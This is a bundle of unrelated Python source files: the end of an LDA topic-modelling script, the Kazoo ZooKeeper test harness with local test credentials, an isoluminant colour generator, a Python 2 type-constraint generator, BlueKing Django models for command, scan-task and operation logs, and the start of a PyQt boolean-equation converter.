lst_perplexity = []
lst_loglik = []
# warning -- slow
for cp in [3, 5, 8, 10, 15, 20]:
    # BUG FIX: the models were saved under 'lda-models/' above but were loaded
    # here without the directory prefix, so load() raised FileNotFoundError.
    fname = 'lda-models/2021-13-mai-lda-model-stemmed-ncomp-' + str(cp) + '.joblib'
    lda_model = load(fname)
    lst_loglik.append(lda_model.score(tf))
    lst_perplexity.append(lda_model.perplexity(tf))
print(lst_perplexity)
# plot the number of components vs. perplexity
plt.plot([3, 5, 8, 10, 15, 20],
         lst_perplexity,
         'r-o')
plt.xlabel('Number of Topics')
plt.ylabel('Perplexity')
plt.title('LDA Model Perplexity by Number of Topics')
#plt.show()
plt.savefig('plots/2021-13-mai-perplexity-plot.png')
# BUG FIX: the first figure was never closed, so the next plt.plot drew on
# top of it and every later .png contained all previous lines.
plt.close()
# plot the number of components vs. perplexity, exclude 20
plt.plot([3, 5, 8, 10, 15],
         lst_perplexity[0:len(lst_perplexity)-1],
         'r-o')
plt.xlabel('Number of Topics')
plt.ylabel('Perplexity')
plt.title('LDA Model Perplexity by Number of Topics')
#plt.show()
plt.savefig('plots/2021-13-mai-perplexity-plot-3to15.png')
plt.close()
# plot the number of components vs log-likelihood
plt.plot([3, 5, 8, 10, 15, 20],
         lst_loglik,
         'b-o')
plt.xlabel('Number of Topics')
plt.ylabel('Log Likelihood')
plt.title('LDA Model Log Likelihood by Number of Topics')
#plt.show()
plt.savefig('plots/2021-13-mai-loglik-plot.png')
plt.close()
# plot the number of components vs log-likelihood, exclude 20
plt.plot([3, 5, 8, 10, 15],
         lst_loglik[0:len(lst_loglik)-1],
         'b-o')
plt.xlabel('Number of Topics')
plt.ylabel('Log Likelihood')
plt.title('LDA Model Log Likelihood by Number of Topics')
#plt.show()
plt.savefig('plots/2021-13-mai-loglik-plot-3to15.png')
plt.close()
########################
# select final LDA model
########################
# The "elbow" is at 10 components. However, we can further reduce dimensionality
# with 5 components, and we find an interpretable output.
# To make a final decision, we will assess the performance of the topic scores
# on predictive models.
################################
# output dataset with LDA scores
################################
# For each shortlisted topic count, score every thread and write the
# per-thread topic weights to a csv keyed by the original df index.
for cp in [5, 10]:
    fname = 'lda-models/2021-13-mai-lda-model-stemmed-ncomp-' + str(cp) + '.joblib'
    lda_model = load(fname)
    thread_topics = lda_model.transform(tf)
    # thread_topics.shape # (177277, 10) good
    topic_df = pd.DataFrame(thread_topics)
    # name the columns topic_0 .. topic_{cp-1}
    new_cols = pd.Series(range(cp)).apply(lambda x: 'topic_'+str(x)).tolist()
    topic_df.columns = new_cols
    # rename the index to be like the original df
    topic_df.index = df.index
    # concatenate
    #df_with_topics = pd.concat([df, topic_df], axis = 1)
    #print(df_with_topics.shape) # (177277, 24)
    # write as csv
    op_fname = 'nlp-data/2021-15-mai-df_topics_' + str(cp) + '.csv'
    print(op_fname)
    topic_df.to_csv(op_fname, index=True)
"""Kazoo testing harnesses"""
import logging
import os
import uuid
import unittest
from kazoo import python2atexit as atexit
from kazoo.client import KazooClient
from kazoo.exceptions import KazooException
from kazoo.protocol.connection import _CONNECTION_DROP, _SESSION_EXPIRED
from kazoo.protocol.states import (
KazooState
)
from kazoo.testing.common import ZookeeperCluster
log = logging.getLogger(__name__)

# Module-level singletons: the running ZooKeeper cluster and the configuration
# it was started with (used by get_global_cluster to detect config changes).
CLUSTER = None
CLUSTER_CONF = None
# Defaults applied when the corresponding environment variables are unset.
CLUSTER_DEFAULTS = {
    "ZOOKEEPER_PORT_OFFSET": 20000,
    "ZOOKEEPER_CLUSTER_SIZE": 3,
    "ZOOKEEPER_OBSERVER_START_ID": -1,
}
def get_global_cluster():
    """Return the shared :class:`ZookeeperCluster` singleton.

    Configuration is read from the ZOOKEEPER_* environment variables (falling
    back to CLUSTER_DEFAULTS). If a cluster already exists and the effective
    configuration has changed, the old cluster is terminated and a new one is
    created. The cluster is terminated at interpreter exit.
    """
    global CLUSTER, CLUSTER_CONF
    cluster_conf = {
        k: os.environ.get(k, CLUSTER_DEFAULTS.get(k))
        for k in ["ZOOKEEPER_PATH",
                  "ZOOKEEPER_CLASSPATH",
                  "ZOOKEEPER_PORT_OFFSET",
                  "ZOOKEEPER_CLUSTER_SIZE",
                  "ZOOKEEPER_VERSION",
                  "ZOOKEEPER_OBSERVER_START_ID",
                  "ZOOKEEPER_JAAS_AUTH"]
    }
    if CLUSTER is not None:
        if CLUSTER_CONF == cluster_conf:
            return CLUSTER
        else:
            log.info('Config change detected. Reconfiguring cluster...')
            CLUSTER.terminate()
            CLUSTER = None
    # Create a new cluster
    ZK_HOME = cluster_conf.get("ZOOKEEPER_PATH")
    ZK_CLASSPATH = cluster_conf.get("ZOOKEEPER_CLASSPATH")
    ZK_PORT_OFFSET = int(cluster_conf.get("ZOOKEEPER_PORT_OFFSET"))
    ZK_CLUSTER_SIZE = int(cluster_conf.get("ZOOKEEPER_CLUSTER_SIZE"))
    ZK_VERSION = cluster_conf.get("ZOOKEEPER_VERSION")
    ZK_OBSERVER_START_ID = int(cluster_conf.get("ZOOKEEPER_OBSERVER_START_ID"))
    assert ZK_HOME or ZK_CLASSPATH or ZK_VERSION, (
        "Either ZOOKEEPER_PATH or ZOOKEEPER_CLASSPATH or "
        "ZOOKEEPER_VERSION environment variable must be defined.\n"
        "For deb package installations this is /usr/share/java")
    # BUG FIX: the version string used to be parsed unconditionally, so a
    # setup defining only ZOOKEEPER_PATH/ZOOKEEPER_CLASSPATH (which the assert
    # above explicitly allows) crashed with TypeError on `'-' in None` before
    # the assert could even run.
    if ZK_VERSION is not None:
        if '-' in ZK_VERSION:
            # Ignore pre-release markers like -alpha
            ZK_VERSION = ZK_VERSION.split('-')[0]
        ZK_VERSION = tuple([int(n) for n in ZK_VERSION.split('.')])
    if ZK_VERSION is not None and ZK_VERSION >= (3, 5):
        additional_configuration_entries = [
            "4lw.commands.whitelist=*",
            "reconfigEnabled=true"
        ]
        # If defined, this sets the superuser password to "<PASSWORD>"
        additional_java_system_properties = [
            "-Dzookeeper.DigestAuthenticationProvider.superDigest="
            "super:D/InIHSb7yEEbrWz8b9l71RjZJU="
        ]
    else:
        additional_configuration_entries = []
        additional_java_system_properties = []
    ZOOKEEPER_JAAS_AUTH = cluster_conf.get("ZOOKEEPER_JAAS_AUTH")
    if ZOOKEEPER_JAAS_AUTH == "digest":
        jaas_config = """
        Server {
            org.apache.zookeeper.server.auth.DigestLoginModule required
            user_super="super_secret"
            user_jaasuser="jaas_password";
        };"""
    elif ZOOKEEPER_JAAS_AUTH == "gssapi":
        # Configure Zookeeper to use our test KDC.
        additional_java_system_properties += [
            "-Djava.security.krb5.conf=%s" % os.path.expandvars(
                "${KRB5_CONFIG}"
            ),
            "-Dsun.security.krb5.debug=true",
        ]
        jaas_config = """
        Server {
            com.sun.security.auth.module.Krb5LoginModule required
            debug=true
            isInitiator=false
            useKeyTab=true
            keyTab="%s"
            storeKey=true
            useTicketCache=false
            principal="zookeeper/127.0.0.1@K<EMAIL>";
        };""" % os.path.expandvars("${KRB5_TEST_ENV}/server.keytab")
    else:
        jaas_config = None
    CLUSTER = ZookeeperCluster(
        install_path=ZK_HOME,
        classpath=ZK_CLASSPATH,
        port_offset=ZK_PORT_OFFSET,
        size=ZK_CLUSTER_SIZE,
        observer_start_id=ZK_OBSERVER_START_ID,
        configuration_entries=additional_configuration_entries,
        java_system_properties=additional_java_system_properties,
        jaas_config=jaas_config
    )
    CLUSTER_CONF = cluster_conf
    # Ensure the cluster's processes are torn down at interpreter exit.
    atexit.register(lambda cluster: cluster.terminate(), CLUSTER)
    return CLUSTER
class KazooTestHarness(unittest.TestCase):
    """Harness for testing code that uses Kazoo

    This object can be used directly or as a mixin. It supports starting
    and stopping a complete ZooKeeper cluster locally and provides an
    API for simulating errors and expiring sessions.

    Example::

        class MyTestCase(KazooTestHarness):
            def setUp(self):
                self.setup_zookeeper()
                # additional test setup

            def tearDown(self):
                self.teardown_zookeeper()

            def test_something(self):
                something_that_needs_a_kazoo_client(self.client)

            def test_something_else(self):
                something_that_needs_zk_servers(self.servers)

    """

    # Default session timeout (seconds) applied to clients created here.
    DEFAULT_CLIENT_TIMEOUT = 15

    def __init__(self, *args, **kw):
        super(KazooTestHarness, self).__init__(*args, **kw)
        # Primary chrooted client (set by setup_zookeeper) and the list of
        # every client handed out, so teardown can stop them all.
        self.client = None
        self._clients = []

    @property
    def cluster(self):
        # Shared, lazily-created ZooKeeper cluster singleton.
        return get_global_cluster()

    @property
    def servers(self):
        # Comma-separated address list of every cluster member.
        return ",".join([s.address for s in self.cluster])

    def _get_nonchroot_client(self):
        # Client connected to the cluster root (no per-test chroot).
        c = KazooClient(self.servers)
        self._clients.append(c)
        return c

    def _get_client(self, **client_options):
        # Client connected under the per-test chroot; self.hosts is set by
        # setup_zookeeper before this is called.
        if 'timeout' not in client_options:
            client_options['timeout'] = self.DEFAULT_CLIENT_TIMEOUT
        c = KazooClient(self.hosts, **client_options)
        self._clients.append(c)
        return c

    def lose_connection(self, event_factory):
        """Force client to lose connection with server"""
        self.__break_connection(_CONNECTION_DROP, KazooState.SUSPENDED,
                                event_factory)

    def expire_session(self, event_factory):
        """Force ZK to expire a client session"""
        self.__break_connection(_SESSION_EXPIRED, KazooState.LOST,
                                event_factory)

    def setup_zookeeper(self, **client_options):
        """Create a ZK cluster and chrooted :class:`KazooClient`

        The cluster will only be created on the first invocation and won't be
        fully torn down until exit.
        """
        do_start = False
        for s in self.cluster:
            if not s.running:
                do_start = True
        if do_start:
            self.cluster.start()
        # Unique chroot per invocation so tests cannot see each other's nodes.
        namespace = "/kazootests" + uuid.uuid4().hex
        self.hosts = self.servers + namespace
        if 'timeout' not in client_options:
            client_options['timeout'] = self.DEFAULT_CLIENT_TIMEOUT
        self.client = self._get_client(**client_options)
        self.client.start()
        self.client.ensure_path("/")

    def teardown_zookeeper(self):
        """Reset and cleanup the zookeeper cluster that was started."""
        # Stop and close every client created during the test; failures to
        # stop are logged but do not prevent closing the remaining clients.
        while self._clients:
            c = self._clients.pop()
            try:
                c.stop()
            except KazooException:
                log.exception("Failed stopping client %s", c)
            finally:
                c.close()
        self.client = None

    def __break_connection(self, break_event, expected_state, event_factory):
        """Break ZooKeeper connection using the specified event.

        Waits up to 5s for the connection to reach ``expected_state`` and up
        to 15s for it to recover to CONNECTED, raising on either timeout,
        then issues a read to confirm the client works again.
        """
        lost = event_factory()
        safe = event_factory()

        def watch_loss(state):
            if state == expected_state:
                lost.set()
            elif lost.is_set() and state == KazooState.CONNECTED:
                safe.set()
                # returning True removes this listener
                return True

        self.client.add_listener(watch_loss)
        self.client._call(break_event, None)
        # NOTE(review): isSet() is the legacy camelCase alias of is_set();
        # confirm the event type produced by event_factory still provides it
        # before upgrading Python (threading.Event dropped it in 3.9).
        lost.wait(5)
        if not lost.isSet():
            raise Exception("Failed to get notified of broken connection.")
        safe.wait(15)
        if not safe.isSet():
            raise Exception("Failed to see client reconnect.")
        self.client.retry(self.client.get_async, '/')
class KazooTestCase(KazooTestHarness):
    """Convenience TestCase that starts/stops ZooKeeper around every test."""

    def setUp(self):
        self.setup_zookeeper()

    def tearDown(self):
        self.teardown_zookeeper()
|
<reponame>NicoleEic/projects
import numpy as np
import sys
from my import mymodule
import matplotlib.pyplot as plt
import pdb
import logging as log
# Per-channel weights for perceived luminance (Rec. 709 luma coefficients).
luminance_factors = {'R': 0.2126, 'G': 0.7152, 'B': 0.0722}
def get_luminance(colour, luminance_factors={'R': 0.2126, 'G': 0.7152, 'B': 0.0722}):
    '''Return the perceived luminance of an RGB colour as the weighted sum
    of its channels (weights default to the Rec. 709 luma coefficients).'''
    red, green, blue = colour[0], colour[1], colour[2]
    return (luminance_factors['R'] * red
            + luminance_factors['G'] * green
            + luminance_factors['B'] * blue)
def rgb2yuv(colour):
    '''Convert an RGB colour to the YUV colour space.

    The colour (length-3 sequence) is right-multiplied by the RGB->YUV
    conversion matrix and the resulting YUV vector is returned.
    '''
    conversion = np.array([[0.29900, -0.16874, 0.50000],
                           [0.58700, -0.33126, -0.41869],
                           [0.11400, 0.50000, -0.08131]])
    return np.dot(colour, conversion)
def diff_colours(c1, c2):
    '''Perceptually weighted Euclidean distance between two RGB colours
    (channel weights 3, 4 and 2 for R, G and B respectively).'''
    delta_r = c1[0] - c2[0]
    delta_g = c1[1] - c2[1]
    delta_b = c1[2] - c2[2]
    return np.sqrt(3 * delta_r ** 2 + 4 * delta_g ** 2 + 2 * delta_b ** 2)
def plot_colours(colour_list):
    '''Show a figure with one subplot patch per colour in colour_list.

    Each subplot is filled with its colour and annotated with the colour's
    index and RGB tuple. Blocks on plt.show().
    '''
    colour_list = [tuple(col) for col in colour_list]
    # grid layout comes from the project helper (my.mymodule)
    n_cols, n_rows = mymodule.get_subplots_matrix(len(colour_list))
    fig = plt.figure()
    for ind, my_colour in enumerate(colour_list):
        ax = fig.add_subplot(n_rows, n_cols, ind + 1)
        plt.plot([0, 1], c=my_colour)
        plt.text(0.5, 0.5, f'{ind}: {my_colour}')
        ax.set_facecolor(my_colour)
        ax.get_xaxis().set_visible(False)
        ax.get_yaxis().set_visible(False)
    plt.show()
def isoluminance_colours(L=0.5, n_colours=10, min_diff_col=0.5, verbose=1):
    '''Get a list of RGB colours that are matched in luminance.

    Staircase search: one channel is swept in coarse steps; for each setting,
    a second channel is nudged up/down in fine steps while the third is solved
    analytically so the weighted luminance equals L. Candidates are kept when
    they are in [0, 1] and at least min_diff_col away (diff_colours) from all
    colours found so far.

    L: desired luminance (ranges from 0 to 1)
    n_colours: desired number of colours generated
    min_diff_col: minimal difference in RGB space across all colours
    verbose: set to 1 to print verbose messages

    Returns the found colours rounded to 2 decimals (possibly fewer than
    n_colours; a message is printed in that case).
    '''
    # enable verboseprint function
    verboseprint = print if verbose else lambda *a, **k: None
    # mapping of index within rgb vector
    rgb_map = dict([(0, 'R'), (1, 'G'), (2, 'B')])
    # step size for initial index in staircase
    step_size = (1 / (n_colours / 3)) * 0.9
    # step size for 2nd index in staircase
    step_staircase = 0.0001
    # initialize output list
    new_colours_list = np.empty((0, 3), float)
    # initialize looping index for 1st index
    ind = 0
    running = 1
    while running:
        # exit while loop when 1st index has looped from 0 to 1
        if ind * step_size > 1:
            verboseprint('range of 1st index exceeded')
            running = 0
        else:
            # loop over R, G, B as 1st index to change
            for ind_fix in [0, 1, 2]:
                # increase 1st index by ind * step_size
                my_colour = np.array([0., 0., 0.])
                my_colour[ind_fix] = ind * step_size
                verboseprint('new colour: ', my_colour)
                # determine which two colours to update
                ind_update = np.where(np.array([0, 1, 2]) != ind_fix)[0]
                # check if a matching colour can be found with the initial value
                max_colour = np.copy(my_colour)
                max_colour[ind_update[0]] = 1
                max_colour[ind_update[1]] = 1
                min_colour = np.copy(my_colour)
                min_colour[ind_update[0]] = 0
                min_colour[ind_update[1]] = 0
                # if no matching colour can be found, continue with next while loop
                if (get_luminance(max_colour) < L) or (get_luminance(min_colour) > L):
                    verboseprint('initial values out of range')
                    ind = ind + 1
                    continue
                # loop over 2nd and 3rd index which one is set first
                for ind_pair in [[ind_update[0], ind_update[1]], [ind_update[1], ind_update[0]]]:
                    up_colour = np.copy(my_colour)
                    down_colour = np.copy(my_colour)
                    searching = 1
                    while searching:
                        # in/decrease second index
                        up_colour[ind_pair[0]] = up_colour[ind_pair[0]] + step_staircase
                        down_colour[ind_pair[0]] = down_colour[ind_pair[0]] - step_staircase
                        if up_colour[ind_pair[0]] > 1:
                            # exit while loop when 2nd index has looped from 0 to 1
                            verboseprint('2nd index out of range')
                            searching = 0
                        else:
                            for col in up_colour, down_colour:
                                # update 3rd index based on luminance value
                                col[ind_pair[1]] = (L - luminance_factors[rgb_map[ind_fix]] * col[ind_fix] - luminance_factors[rgb_map[ind_pair[0]]] * col[ind_pair[0]]) / luminance_factors[rgb_map[ind_pair[1]]]
                                # determine difference of new colour with the rest of the list
                                if len(new_colours_list) > 0:
                                    diff_C = np.apply_along_axis(diff_colours, 1, new_colours_list, col)
                                else:
                                    diff_C = 10
                                # add new colour when not too similar and within 0 1
                                if np.all(diff_C > min_diff_col) and not (np.any(col < 0) or np.any(col > 1)) and running:
                                    verboseprint(f'{my_colour}, found: {col}')
                                    verboseprint(f'difference in colour: {diff_C}')
                                    # add new colour
                                    new_colours_list = np.vstack((new_colours_list, col))
                                    # check that colour has not been added before
                                    # NOTE(review): this round-trips the array through a
                                    # list of tuples; np.unique restores an ndarray.
                                    new_colours_list = [tuple(col) for col in new_colours_list]
                                    new_colours_list = np.unique(new_colours_list, axis=0)
                                    # exit while loop for this 2nd index
                                    searching = 0
                                # exit while loops when list is complete
                                if len(new_colours_list) == n_colours:
                                    running = 0
            # update outer while loop index
            ind = ind + 1
    new_colours_list = np.around(new_colours_list, 2)
    print(new_colours_list)
    if len(new_colours_list) < n_colours:
        print('not enough colours generated. Decrease min_diff_col.')
    else:
        print('done!')
    return new_colours_list
if __name__ == "__main__":
    import sys
    # BUG FIX: np.float and np.int were deprecated aliases of the builtins
    # and were removed in NumPy 1.20+/1.24; use the builtins directly.
    isoluminance_colours(float(sys.argv[1]), int(sys.argv[2]))
|
import ast
import sys
import copy
from collections import namedtuple
from rightarrow.annotations import *
class Constraint(object):
    """A subtyping constraint of the form ``S <: T``."""

    def __init__(self, subtype, supertype):
        self.subtype = subtype
        self.supertype = supertype

    def __str__(self):
        return '%s <: %s' % (self.subtype, self.supertype)

    def substitute(self, substitution):
        # Apply the substitution to both sides, producing a new constraint.
        new_subtype = self.subtype.substitute(substitution)
        new_supertype = self.supertype.substitute(substitution)
        return Constraint(subtype=new_subtype, supertype=new_supertype)
class ConstrainedType(object):
    """A type together with a set of constraints: ``T & [S1 <: T1, ...]``."""

    def __init__(self, type=None, constraints=None):
        self.type = type
        # falsy (None or empty) constraints normalize to a fresh empty list
        self.constraints = constraints or []
class ConstrainedEnv(object):
    """
    An environment mapping variables to types, along with some constraints
    and a return type. One way to write it might be like...

        T_return & { x: T_x, f: T_f, ... } & [S1 <: T1, ...]
    """

    def __init__(self, env=None, constraints=None, return_type=None):
        self.env = env or {}
        self.constraints = constraints or []
        self.return_type = return_type

    def substitute(self, substitution):
        """Apply a type substitution to every binding, constraint and the return type."""
        substituted_env = dict([(name, ty.substitute(substitution))
                                for name, ty in self.env.items()])
        substituted_constraints = [c.substitute(substitution) for c in self.constraints]
        if self.return_type is None:
            substituted_return = None
        else:
            substituted_return = self.return_type.substitute(substitution)
        return ConstrainedEnv(env=substituted_env,
                              constraints=substituted_constraints,
                              return_type=substituted_return)

    def pretty(self):
        """Human-readable dump of the bindings, constraints and result type."""
        bindings = '\n\t'.join(['%s: %s' % (name, ty) for name, ty in self.env.items()])
        constraint_lines = '\n\t'.join([str(c) for c in self.constraints])
        return ("Env:\n\t%(bindings)s\n\nConstraints:\n\t%(constraints)s\n\nResult:\n\t%(result)s"
                % dict(bindings=bindings,
                       constraints=constraint_lines,
                       result=self.return_type))
def constraints(pyast, env=None):
    """
    Generate typing constraints for a top-level AST node.

    Module/Interactive nodes thread the environment through each statement;
    Expression nodes are typed directly. Raises for any other node kind.
    Returns a ConstrainedEnv.
    """
    env = env or {}

    if isinstance(pyast, ast.Module) or isinstance(pyast, ast.Interactive):
        # Work on a copy so the caller's environment is not mutated.
        env = copy.copy(env)
        constraints = []  # NOTE: intentionally shadows this function's name
        for stmt in pyast.body:
            cs = constraints_stmt(stmt, env=env)
            env.update(cs.env)
            constraints += cs.constraints
        return ConstrainedEnv(env=env, constraints=constraints)
    elif isinstance(pyast, ast.Expression):
        expr_ty = constraints_expr(pyast.body, env=env)
        return ConstrainedEnv(env=env, constraints=expr_ty.constraints)
    else:
        raise Exception('Unknown ast node: %s' % pyast)
def extended_env(env, more_env):
    """Return a shallow copy of ``env`` updated with the bindings of
    ``more_env`` (the original ``env`` is left untouched)."""
    combined = copy.copy(env)
    combined.update(more_env)
    return combined
# Note that this is rather different in Python 3 - and better!
def fn_env(arguments):
    """
    Build a fresh environment for a function's parameters.

    Python 2 AST: each positional arg is an ast.Name in Param context; each
    parameter (including *vararg/**kwarg when present) is bound to a fresh
    type variable. Raises for any other argument node shape.
    """
    new_env = {}
    for arg in arguments.args:
        if isinstance(arg, ast.Name) and isinstance(arg.ctx, ast.Param):
            new_env[arg.id] = fresh() # TODO: ??
        else:
            raise Exception('Arg is not a name in Param context!? %s' % arg)
    if arguments.vararg:
        new_env[arguments.vararg] = fresh() # TODO: sub/superty of list
    if arguments.kwarg:
        new_env[arguments.kwarg] = fresh() # TODO: sub/superty of dict
    return new_env
def union(left, right):
    """Combine two optional types: None acts as the identity; otherwise the
    two types are wrapped in a Union (right before left, as originally)."""
    if left is None:
        return right
    if right is None:
        return left
    return Union([right, left])
def constraints_stmt(stmt, env=None):
    """
    Since a statement may define new names or return an expression,
    the constraints that result are in a
    ConstrainedEnv mapping names to types, with constraints, and maybe
    having a return type (which is a constrained type)
    """
    env = env or {}

    if isinstance(stmt, ast.FunctionDef):
        # Type the body under the parameter-extended environment, unioning
        # the return types contributed by each body statement.
        arg_env = fn_env(stmt.args)
        body_env = extended_env(env, arg_env)
        constraints = []
        return_type = None # TODO: should be fresh and constrained?
        for body_stmt in stmt.body:
            cs = constraints_stmt(body_stmt, env=body_env)
            body_env.update(cs.env)
            constraints += cs.constraints
            return_type = union(return_type, cs.return_type)
        # Bind the function name to its inferred Function type.
        env[stmt.name] = Function(arg_types=[arg_env[arg.id] for arg in stmt.args.args],
                                  return_type=return_type)
        return ConstrainedEnv(env=env, constraints=constraints)
    elif isinstance(stmt, ast.Expr):
        constrained_ty = constraints_expr(stmt.value, env=env)
        return ConstrainedEnv(env=env, constraints=constrained_ty.constraints)
    elif isinstance(stmt, ast.Return):
        if stmt.value:
            expr_result = constraints_expr(stmt.value, env=env)
            return ConstrainedEnv(env=env, constraints=expr_result.constraints, return_type=expr_result.type)
        else:
            # bare `return`: constrain a fresh variable to NoneType
            result = fresh()
            return ConstrainedEnv(env=env, constraints=[Constraint(subtype=result, supertype=NamedType('NoneType'))])
    elif isinstance(stmt, ast.Assign):
        if len(stmt.targets) > 1:
            raise NotImplementedError('Cannot generate constraints for multi-target assignments yet')
        expr_result = constraints_expr(stmt.value, env=env)
        target = stmt.targets[0].id
        # For an assignment, we actually generate a fresh variable so that it can be the union of all things assigned
        # to it. We do not do any typestate funkiness.
        if target not in env:
            env[target] = fresh()
        return ConstrainedEnv(env=env,
                              constraints = expr_result.constraints + [Constraint(subtype=expr_result.type,
                                                                                  supertype=env[target])])
    else:
        raise NotImplementedError('Constraint gen for stmt %s' % stmt)
def constraints_expr(expr, env=None):
    """Generate type constraints for an AST expression.

    Returns a ConstrainedType (the expression's type plus any constraints
    it induces). Raises for names missing from ``env`` and for unsupported
    node kinds. NOTE(review): Python 2 code — the ``long`` branch below
    only exists on Python 2.
    """
    env = env or {}
    if isinstance(expr, ast.Name) and isinstance(expr.ctx, ast.Load):
        if expr.id in ['False', 'True']: # Unlike other literals, these are actually just global identifiers
            return ConstrainedType(type=bool_t)
        elif expr.id in env:
            return ConstrainedType(type=env[expr.id])
        else:
            raise Exception('Variable not found in environment: %s' % expr.id)
    elif isinstance(expr, ast.Num):
        # The python ast module already chose the type of the num
        if isinstance(expr.n, int):
            return ConstrainedType(type=int_t)
        elif isinstance(expr.n, long):
            return ConstrainedType(type=long_t)
        elif isinstance(expr.n, float):
            return ConstrainedType(type=float_t)
        elif isinstance(expr.n, complex):
            return ConstrainedType(type=complex_t)
        # NOTE(review): falls through (implicitly returns None) for any
        # other numeric literal type.
    elif isinstance(expr, ast.Str):
        return ConstrainedType(type=str_t)
    elif isinstance(expr, ast.List):
        # Element type is a fresh variable, to be constrained by later use.
        return ConstrainedType(type=List(elem_ty=fresh()))
    elif isinstance(expr, ast.BinOp):
        left = constraints_expr(expr.left, env=env)
        right = constraints_expr(expr.right, env=env)
        ty = fresh()
        if isinstance(expr.op, ast.Mult):
            # TODO: consider whether all types should match (forces coercions to be explicit; a good thing)
            # Note: though strings and bools can be used in mult, forget it!
            op_constraints = [Constraint(subtype=left.type, supertype=numeric_t),
                              Constraint(subtype=right.type, supertype=numeric_t),
                              Constraint(subtype=ty, supertype=numeric_t)]
        else:
            raise NotImplementedError('BinOp') # TODO: just use function application constraint gen
        # TODO: return type should actually be fancier
        return ConstrainedType(type=ty, constraints=left.constraints+right.constraints+op_constraints)
    else:
        raise NotImplementedError('Constraint gen for %s' % expr)
if __name__ == '__main__':
    # CLI entry point (Python 2): parse the file named in argv[1], then dump
    # its AST and the generated constraints for inspection.
    with open(sys.argv[1]) as fh:
        proggy = ast.parse(fh.read())
    print ast.dump(proggy)
    print constraints(proggy).pretty()
|
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making 蓝鲸智云(BlueKing) available.
Copyright (C) 2017 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and limitations under the License.
"""
from django.db import models
import time
from common.log import logger
class ExcRecord(models.Model):
    """Command-execution record: target host, command, and outcome."""
    ip = models.CharField(u"IP", max_length=20)
    cmd = models.CharField(u"CMD", max_length=100)
    result = models.CharField(u"RESULT", max_length=10)
    # NOTE(review): stored as a CharField rather than DateTimeField — callers
    # apparently write pre-formatted timestamp strings.
    exctime = models.CharField(u"EXCTIME", max_length=50)
class UserInfo(models.Model):
    """Account record: login name, display (Chinese) name, and role."""
    username = models.CharField(u'UserName', max_length=30)
    # BUGFIX: verbose name was a copy-paste duplicate of u'UserName';
    # this field holds the user's display name, not the login name.
    cname = models.CharField(u'CName', max_length=30)
    rolename = models.CharField(u'RoleName', max_length=20)
class LoginInfo(models.Model):
    """Login session record for a user."""
    username = models.CharField(u'UserName', max_length=30)
    # NOTE(review): stored as CharField; presumably a formatted date string.
    date = models.CharField(u'Date', max_length=30)
    # BUGFIX: verbose name was copy-pasted u'Date'; this field holds the
    # BlueKing login token, not a date.
    bk_token = models.CharField(u'Token', max_length=100)
# Stores vulnerability-scan task data. Field verbose names (Chinese) map to:
# task name, tool version, scan tool, scan targets, creator, creation time,
# SOC task name / result id / status / progress, and report-exists flag.
class VulnScanTasks(models.Model):
    vulnscan_taskname = models.CharField(u'漏扫任务名称',max_length=50)
    version = models.CharField(u'工具版本',max_length=10)
    supplier = models.CharField(u'扫描工具',max_length=20)
    iplist = models.CharField(u'扫描目标',max_length=1000)
    creator = models.CharField(u'创建人',max_length=20)
    create_time = models.DateTimeField(u'创建时间')
    #finish_time = models.DateTimeField(u'结束时间')
    soc_task_name = models.CharField(u'SOC漏扫任务名称',max_length=50)
    soc_task_resultid = models.CharField(u'SOC任务ID',max_length=50)
    soc_task_status = models.CharField(u'SOC任务状态',max_length=10)
    soc_task_progress = models.CharField(u'SOC任务进度',max_length=10)
    has_report = models.BooleanField(u"是否已出报告", default=False)
    def __unicode__(self):
        # Display representation (Python 2 Django): the task name.
        return self.vulnscan_taskname
    class Meta:
        verbose_name = u"漏扫任务"
class LogsManager(models.Manager):
    def save_data(self, data):
        """Persist one operation record.

        ``data`` is a sequence of (ip, operator, operation, operate_result).
        The operation timestamp is taken at call time. Returns a dict with
        ``result`` (bool) and a user-facing ``message`` string.
        """
        try:
            Logs.objects.create(
                ip=data[0],
                operator=data[1],
                operation=data[2],
                operate_result=data[3],
                # time.localtime() already defaults to "now"; the explicit
                # time.time() argument was redundant.
                operate_time=time.strftime('%Y-%m-%d %H:%M:%S', time.localtime())
            )
            result = {'result': True, 'message': u"保存成功"}
        except Exception as e:  # "as" syntax: valid on Python 2.6+ and 3
            logger.error(u"save_data %s" % e)
            result = {'result': False, 'message': u"保存失败, %s" % e}
        return result
class Logs(models.Model):
    """
    Historical operation records (one row per executed command).
    """
    ip = models.CharField('ip', max_length=64, blank=True, null=True)
    operator = models.CharField(u'操作人', max_length=64)  # operator
    operation = models.CharField(u'执行命令', max_length=64)  # executed command
    operate_result = models.BooleanField(u'执行结果')  # success flag
    operate_time = models.DateTimeField(u"执行时间")  # execution time
    # Custom manager providing save_data().
    objects = LogsManager()
    def __unicode__(self):
        # Display representation (Python 2 Django): the source IP.
        return self.ip
    class Meta:
        verbose_name = u"历史操作记录"  # "historical operation records"
|
# T3Window.py
# Created by the author of Boolean-Algebra-Toolbox
# https://github.com/alxxlc/Boolean-Algebra-Toolbox
# Test Equation: (AVB') (AVCVD') (A+B+D')
import sys
from PyQt5 import QtCore, QtWidgets, uic
from ttConverter import *
from ttGenerator import *
import pyperclip
# Load the Qt Designer UI definition; index 0 is the generated form class.
form_class = uic.loadUiType("T3Window.ui")[0]
# Shared converter/generator instances used by the main window.
eqConverter = ttConverter()
tableGenerator = ttGenerator()
# Default NOT-operator placement for the old/new equation notations.
oldOrder = "suffix"
newOrder = "prefix"
class MyWindowClass(QtWidgets.QMainWindow, form_class):
    """Main window: converts boolean equations between operator notations."""

    def __init__(self, parent=None):
        QtWidgets.QMainWindow.__init__(self, parent)
        self.setupUi(self)
        # Seed the converter with the symbols currently shown in the combo boxes.
        eqConverter.changeOr(False, self.oldOrCombo.currentText(), self.newOrCombo.currentText())
        eqConverter.changeAnd(False, True, self.oldAndCombo.currentText(), self.newAndCombo.currentText())
        eqConverter.changeNot(False, self.oldNotCombo.currentText(), oldOrder, self.newNotCombo.currentText(), newOrder)
        # Bind the event listener to the event handler. (convertBtn.clicked listen to convertBtn_Clicked() function)
        self.convertBtn.clicked.connect(self.convertBtn_Clicked)
